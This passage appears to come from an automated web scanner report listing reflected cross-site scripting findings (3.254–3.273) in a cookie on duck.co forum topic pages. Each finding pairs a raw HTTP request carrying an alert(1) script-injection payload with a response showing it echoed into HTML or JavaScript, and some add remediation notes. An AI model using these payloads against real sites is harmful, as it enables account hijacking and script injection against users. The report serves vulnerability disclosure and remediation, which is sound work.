

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc72954339b45"-alert(1)-"9d20e516917";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.254. http://duck.co/topic/cached-archived-links [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/cached-archived-links

Request

GET /topic/cached-archived-links HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc7295437d3ae"><script>alert(1)</script>9f77a29d4db;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=A91CD8EF4D5FB19CD49BFF22F1C598FC; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:45:46 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc7295437d3ae"><script>alert(1)</script>9f77a29d4db"/>
...[SNIP]...

3.255. http://duck.co/topic/changing-font-text-and-links [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/changing-font-text-and-links

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/changing-font-text-and-links HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543419eb"-alert(1)-"7dc60de17ca;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=30B6497681E12CB4538A1B5358FCE029; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:08 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc729543419eb"-alert(1)-"7dc60de17ca";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.256. http://duck.co/topic/changing-font-text-and-links [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/changing-font-text-and-links

Request

GET /topic/changing-font-text-and-links HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc72954366a9e"><script>alert(1)</script>f0aab23c929;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=69DEBD798BDFA67A06A47891D2286104; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:45:57 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc72954366a9e"><script>alert(1)</script>f0aab23c929"/>
...[SNIP]...

3.257. http://duck.co/topic/ddg-gg [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/ddg-gg

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/ddg-gg HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543ddde2"-alert(1)-"576427f0dae;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=2C3CB8AC47442BD1D623248962E59BA7; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:13 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc729543ddde2"-alert(1)-"576427f0dae";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.258. http://duck.co/topic/ddg-gg [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/ddg-gg

Request

GET /topic/ddg-gg HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc7295433e31d"><script>alert(1)</script>490d6072a39;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=144D68D6695FB55FE9EBD127B009B256; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:04 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc7295433e31d"><script>alert(1)</script>490d6072a39"/>
...[SNIP]...

3.259. http://duck.co/topic/ddg-in-alternative-web-browsers [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/ddg-in-alternative-web-browsers

Request

GET /topic/ddg-in-alternative-web-browsers HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc72954319862"><script>alert(1)</script>fa852c705f8;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=2270988CD59DDA582B360EF93DDD41A2; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:05 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc72954319862"><script>alert(1)</script>fa852c705f8"/>
...[SNIP]...

3.260. http://duck.co/topic/ddg-in-alternative-web-browsers [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/ddg-in-alternative-web-browsers

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/ddg-in-alternative-web-browsers HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc72954377cec"-alert(1)-"8bea2ac94de;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=A366A298D1CAF20F319134D7D706D000; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:23 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc72954377cec"-alert(1)-"8bea2ac94de";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.261. http://duck.co/topic/ddg-is-one-of-zoho-s-esteemed-customers [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/ddg-is-one-of-zoho-s-esteemed-customers

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/ddg-is-one-of-zoho-s-esteemed-customers HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc72954342e07"-alert(1)-"b19ed1cb792;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=65E54A644CF76E3CA481F8B93861AB8C; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:00 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc72954342e07"-alert(1)-"b19ed1cb792";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.262. http://duck.co/topic/ddg-is-one-of-zoho-s-esteemed-customers [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/ddg-is-one-of-zoho-s-esteemed-customers

Request

GET /topic/ddg-is-one-of-zoho-s-esteemed-customers HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc72954394aba"><script>alert(1)</script>5c372f51b72;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=239674CF646FCDF70075BBFCB839D6C1; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:45:48 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc72954394aba"><script>alert(1)</script>5c372f51b72"/>
...[SNIP]...

3.263. http://duck.co/topic/ddg-own-search-engine [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/ddg-own-search-engine

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/ddg-own-search-engine HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543f22b3"-alert(1)-"69b02a7d139;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=9537DB1CD7D801DFB91B11062124B54C; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:08 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc729543f22b3"-alert(1)-"69b02a7d139";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.264. http://duck.co/topic/ddg-own-search-engine [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/ddg-own-search-engine

Request

GET /topic/ddg-own-search-engine HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543503c6"><script>alert(1)</script>60aa58b76ad;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=D6A06B5C0E4BBF8E20A81DE36A75A0A2; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:45:55 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc729543503c6"><script>alert(1)</script>60aa58b76ad"/>
...[SNIP]...

3.265. http://duck.co/topic/ddg-userbar-to-spread-the-word [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/ddg-userbar-to-spread-the-word

Request

GET /topic/ddg-userbar-to-spread-the-word HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543870da"><script>alert(1)</script>ee4e6391180;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=51754DA8EC7DAC31A77D880E3DD0D4F1; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:13 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc729543870da"><script>alert(1)</script>ee4e6391180"/>
...[SNIP]...

3.266. http://duck.co/topic/ddg-userbar-to-spread-the-word [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/ddg-userbar-to-spread-the-word

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/ddg-userbar-to-spread-the-word HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc72954377105"-alert(1)-"13586e56e19;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=AFB707EDB495BED6CAF3F31F6EFC30C6; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:25 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc72954377105"-alert(1)-"13586e56e19";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.267. http://duck.co/topic/default-header-color [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/default-header-color

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/default-header-color HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc72954317ef2"-alert(1)-"be790f3129f;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=38A4C7C2F8C35B766355E6C9313C020F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:49 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc72954317ef2"-alert(1)-"be790f3129f";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.268. http://duck.co/topic/default-header-color [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/default-header-color

Request

GET /topic/default-header-color HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543471c7"><script>alert(1)</script>9e3a18c62a1;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=C98D37FC4A29494F9880C335EC2B8F39; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:34 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc729543471c7"><script>alert(1)</script>9e3a18c62a1"/>
...[SNIP]...

3.269. http://duck.co/topic/differentiate-duckduckgo-with-other [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/differentiate-duckduckgo-with-other

Request

GET /topic/differentiate-duckduckgo-with-other HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc7295439b24a"><script>alert(1)</script>c8820ccbe36;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=55EBBD07F7A2E3E50F753D12BCD61BD8; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:45:47 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc7295439b24a"><script>alert(1)</script>c8820ccbe36"/>
...[SNIP]...

3.270. http://duck.co/topic/differentiate-duckduckgo-with-other [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/differentiate-duckduckgo-with-other

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/differentiate-duckduckgo-with-other HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc72954376e28"-alert(1)-"28ba53bb911;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=855A9C1AB7DD8CC4FB09775A96E25983; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:45:56 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc72954376e28"-alert(1)-"28ba53bb911";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.271. http://duck.co/topic/duckduckgo-webs-com-custom-logos [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/duckduckgo-webs-com-custom-logos

Request

GET /topic/duckduckgo-webs-com-custom-logos HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543caf4e"><script>alert(1)</script>db0f1027f1;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=2A6C51CE461D37A6572A3662B0D5E07D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:21 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc729543caf4e"><script>alert(1)</script>db0f1027f1"/>
...[SNIP]...

3.272. http://duck.co/topic/duckduckgo-webs-com-custom-logos [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/duckduckgo-webs-com-custom-logos

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/duckduckgo-webs-com-custom-logos HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543aa3bd"-alert(1)-"feccf6c0290;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=8CFBE824A0BE8568A06F4895C6752945; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:35 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc729543aa3bd"-alert(1)-"feccf6c0290";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.273. http://duck.co/topic/foss-donation-nominations [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/foss-donation-nominations

Request

